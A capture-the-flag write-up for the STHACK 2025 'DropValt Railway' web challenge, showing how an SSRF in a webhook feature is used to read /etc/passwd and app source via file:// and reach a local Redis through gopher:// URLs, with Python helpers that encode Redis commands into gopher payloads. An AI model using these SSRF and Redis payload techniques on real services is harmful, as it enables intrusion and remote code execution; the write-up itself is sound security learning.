STHACK 2025 - DropValt Railway - Sabotage 1/2

This web challenge, created by Agrorec and Ajani, was a simple application that let us add webhooks.



The most common vulnerability in webhook implementations is SSRF, so that’s where I started.

First, I had the application send a simple HTTP request to my Burp Collaborator, which received:

    POST / HTTP/1.1
    Host: url.oastify.com
    Content-Type: application/json
    Accept: application/json
    Content-Length: 149

    {"type":"train_arrival","timestamp":1748096581,"infos":{"station_id":43,"train_id":5115,"priority":"high","message":"Train arrived at the station."}}



So it’s an SSRF, as I guessed. The next step was to try other protocols; the ones that interest us are file and gopher. Reading /etc/passwd through the file protocol returned:

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
    _apt:x:42:65534::/nonexistent:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
    systemd-timesync:x:996:996:systemd Time Synchronization:/:/usr/sbin/nologin
    dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
    messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
    syslog:x:102:102::/nonexistent:/usr/sbin/nologin
    systemd-resolve:x:991:991:systemd Resolver:/:/usr/sbin/nologin
    tss:x:103:103:TPM software stack,,,:/var/lib/tpm:/bin/false
    uuidd:x:104:105::/run/uuidd:/usr/sbin/nologin
    sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
    pollinate:x:106:1::/var/cache/pollinate:/bin/false
    tcpdump:x:107:108::/nonexistent:/usr/sbin/nologin
    landscape:x:108:109::/var/lib/landscape:/usr/sbin/nologin
    fwupd-refresh:x:990:990:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
    polkitd:x:989:989:User for polkitd:/:/usr/sbin/nologin
    redis:x:109:112::/var/lib/redis:/usr/sbin/nologin

The redis account shows that Redis is installed on the machine, and Redis is generally a good target for getting RCE through gopher.
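Spotting the service account by eye works, but the same check can be scripted. A minimal sketch, assuming a hypothetical watch-list of account names; the function name and the shortened sample are mine, not part of the challenge:

```python
# Hypothetical watch-list of account names that usually indicate a network service.
INTERESTING = {"redis", "mysql", "postgres", "mongodb", "memcache", "sshd"}


def service_accounts(passwd_text: str) -> list[str]:
    """Return account names from an /etc/passwd dump that are on the watch-list."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.strip().split(":")
        # A well-formed passwd entry has exactly 7 colon-separated fields.
        if len(fields) == 7 and fields[0] in INTERESTING:
            found.append(fields[0])
    return found


# Three lines taken from the dump above.
sample = """root:x:0:0:root:/root:/bin/bash
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
redis:x:109:112::/var/lib/redis:/usr/sbin/nologin"""

print(service_accounts(sample))
```

An account only hints that a package is installed; it does not prove the service is running or listening.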

When I talked to the challenge author afterwards, he hadn’t realised that we could use the file protocol; his aim was for us to try some common ports blindly until we got our reverse shell.

I also managed to dump all of the app’s source code, starting with /proc/self/cmdline, which pointed us to /var/www/html/web/trigger_webhooks.php:
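For the blind approach the author had in mind, one would walk through local ports of services that are commonly reachable over gopher. A minimal sketch, assuming a hypothetical port list (only Redis on 6379 is confirmed by this writeup):

```python
# Default ports of services often targeted through SSRF. This list is an
# assumption for illustration; only 6379 (Redis) is confirmed in this writeup.
COMMON_PORTS = {
    6379: "redis",
    11211: "memcached",
    3306: "mysql",
    5432: "postgresql",
    9000: "php-fpm",
}


def candidate_urls(host: str = "127.0.0.1") -> list[str]:
    """Build one gopher:// base URL per candidate port, in ascending port order."""
    return [f"gopher://{host}:{port}/_" for port in sorted(COMMON_PORTS)]


for url in candidate_urls():
    print(url)
```

Each base URL still needs a service-specific payload appended after the underscore before it is of any use.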

    <?php
    require 'vendor/autoload.php'; // Load Predis via Composer
    use Predis\Client;
    require 'db/db.php'; // Load the database configuration

    echo "Start trigger webhooks\n";

    // Redis configuration
    $redis = new Client([
        'scheme' => 'tcp',
        'host' => '127.0.0.1',
        'port' => 6379,
    ]);

    // Name of the Redis list to watch
    $redisList = 'station_events';

    // Function to send several HTTP POST requests in parallel
    function triggerWebhooksAsync($webhooks, $payload) {
        $multiHandle = curl_multi_init();
        $handles = [];
        foreach ($webhooks as $webhook) {
            $ch = curl_init();
            curl_setopt_array($ch, [
                CURLOPT_URL => $webhook['url'],
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => $payload, // Send the payload as the request body
                CURLOPT_TIMEOUT => 1, // Short timeout
                CURLOPT_HTTPHEADER => [
                    'Content-Type: application/json',
                    'Accept: application/json',
                ],
                CURLOPT_RETURNTRANSFER => true, // Capture the response
            ]);
            curl_multi_add_handle($multiHandle, $ch);
            $handles[$webhook['id']] = $ch;
        }

        // Run all requests in parallel
        do {
            $status = curl_multi_exec($multiHandle, $active);
            curl_multi_select($multiHandle);
        } while ($active && $status == CURLM_OK);

        // Collect the responses and HTTP status codes
        $results = [];
        foreach ($handles as $webhookId => $ch) {
            $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            $response = curl_multi_getcontent($ch);
            $results[] = [
                'webhook_id' => $webhookId,
                'http_code' => $httpCode,
                'response' => $response,
            ];
            curl_multi_remove_handle($multiHandle, $ch);
            curl_close($ch);
        }
        curl_multi_close($multiHandle);
        return $results;
    }

    echo "Listening for new events in Redis list: $redisList...\n";

    while (true) {
        try {
            // Wait for a new event in the Redis list
            $event = $redis->blpop($redisList, 0); // [list_name, event_data]
            if ($event) {
                $eventData = json_decode($event[1], true);
                if (!$eventData || !isset($eventData['type'], $eventData['timestamp'], $eventData['infos'])) {
                    echo "Invalid event data: " . $event[1] . "\n";
                    continue;
                }

                // Fetch all webhooks
                $webhooks = $pdo->query("SELECT * FROM webhook")->fetchAll(PDO::FETCH_ASSOC);

                // Prepare the payload
                $payload = json_encode([
                    'type' => $eventData['type'],
                    'timestamp' => $eventData['timestamp'],
                    'infos' => $eventData['infos'],
                ]);

                // Trigger the webhooks asynchronously
                echo "Triggering webhooks asynchronously...\n";
                $results = triggerWebhooksAsync($webhooks, $payload);

                // Record the attempts in the database
                foreach ($results as $result) {
                    $stmt = $pdo->prepare("INSERT INTO webhook_attempt (webhook_id, at, url, body, status, response) VALUES (:webhook_id, :at, :url, :body, :status, :response)");
                    $stmt->execute([
                        ':webhook_id' => $result['webhook_id'],
                        ':at' => date('Y-m-d H:i:s'),
                        ':url' => $webhooks[array_search($result['webhook_id'], array_column($webhooks, 'id'))]['url'],
                        ':body' => $payload,
                        ':status' => $result['http_code'],
                        ':response' => $result['response'],
                    ]);
                    if ($result['http_code'] >= 200 && $result['http_code'] < 300) {
                        echo "Webhook triggered successfully for ID {$result['webhook_id']}. Response: {$result['response']}\n";
                    } else {
                        echo "Failed to trigger webhook for ID {$result['webhook_id']}. HTTP Code: {$result['http_code']}. Response: {$result['response']}\n";
                    }
                }
            }
        } catch (Exception $e) {
            echo "An error occurred: " . $e->getMessage() . "\n";
        }
    }

There were a few other files, but I didn’t bother putting all the source code here.

Normally the next part would be easy. However, the challenge author had mistakenly installed Redis 7.0.15, which we can see by sending the following payload (an INFO command, shown in readable form; in the real URL each \r\n is percent-encoded as %0D%0A):
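A note on the /proc/self/cmdline read that started the source dump: the file holds the process arguments separated by NUL bytes, so the raw response needs a little parsing before the script path stands out. A minimal sketch; the sample bytes are an assumption, since the writeup only confirms the script path, not the interpreter name:

```python
def parse_cmdline(raw: bytes) -> list[str]:
    """Split the NUL-separated content of /proc/<pid>/cmdline into arguments.

    Empty chunks (such as the one after the trailing NUL) are dropped.
    """
    return [part.decode(errors="replace") for part in raw.split(b"\x00") if part]


# Assumed sample: "php" as argv[0] is a guess; the path is the one from the writeup.
raw = b"php\x00/var/www/html/web/trigger_webhooks.php\x00"
print(parse_cmdline(raw))
```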

gopher://127.0.0.1:6379/_*1\r\n$4\r\nINFO\r\n
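A sketch of how such a URL can be built. Each Redis command is serialised in the RESP format (an argument count line, then a length line and the value for every argument, all terminated by CRLF) and percent-encoded after the underscore, which fills the item-type slot of the gopher path and is not sent to the server. The helper names are mine, not Gopherus’s:

```python
from urllib.parse import quote


def resp_encode(*args: str) -> bytes:
    """Serialise one Redis command as a RESP array of bulk strings."""
    out = f"*{len(args)}\r\n".encode()
    for arg in args:
        data = arg.encode()
        out += b"$" + str(len(data)).encode() + b"\r\n" + data + b"\r\n"
    return out


def gopher_url(host: str, port: int, *commands: list[str]) -> str:
    """Concatenate the encoded commands and wrap them in a gopher:// URL."""
    payload = b"".join(resp_encode(*cmd) for cmd in commands)
    # safe="" forces '*', '$', CR and LF to be percent-encoded.
    return f"gopher://{host}:{port}/_" + quote(payload, safe="")


print(gopher_url("127.0.0.1", 6379, ["INFO"]))
```

Several commands can be chained by passing more lists, for example `gopher_url(host, port, ["INFO"], ["QUIT"])`.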

Because of this Redis version, the payload we generated with Gopherus failed with the following errors:

    +OK
    -ERR CONFIG SET failed (possibly related to argument 'dir') - can't set protected config
    -ERR CONFIG SET failed (possibly related to argument 'dbfilename') - can't set protected config
    +OK

The fix was easy: the challenge author downgraded Redis to an older version, in which dir and dbfilename are not protected configs, and we got our RCE.
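For context, Redis 7.0 introduced protected configs: dir and dbfilename can no longer be changed with CONFIG SET unless the enable-protected-configs setting allows it, which is what the errors above report. A minimal sketch of pulling the version out of an INFO reply and checking for that default; the function names and the sample reply are illustrative:

```python
from typing import Optional


def redis_version(info_text: str) -> Optional[tuple[int, ...]]:
    """Extract redis_version from an INFO reply as a tuple of integers."""
    for line in info_text.splitlines():
        if line.startswith("redis_version:"):
            value = line.split(":", 1)[1].strip()
            return tuple(int(part) for part in value.split("."))
    return None


def dir_protected_by_default(version: tuple[int, ...]) -> bool:
    """True for Redis 7.0 and later, where dir/dbfilename are protected configs."""
    return version >= (7, 0)


# Shortened, assumed sample of an INFO reply.
sample_info = "# Server\r\nredis_version:7.0.15\r\nredis_mode:standalone\r\n"
version = redis_version(sample_info)
print(version, dir_protected_by_default(version))
```

The check only reflects the default; an administrator can change enable-protected-configs in redis.conf.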

And then we got our flag: STHACK{GO-GO-GOFER}

When I came back a few hours after the end of the CTF to finish my writeup, I noticed that the file protocol had been disabled and the SSRF output was now blind. This would have made the challenge slightly harder, since we would not have known which services were running, but closer to what the challenge author had originally intended.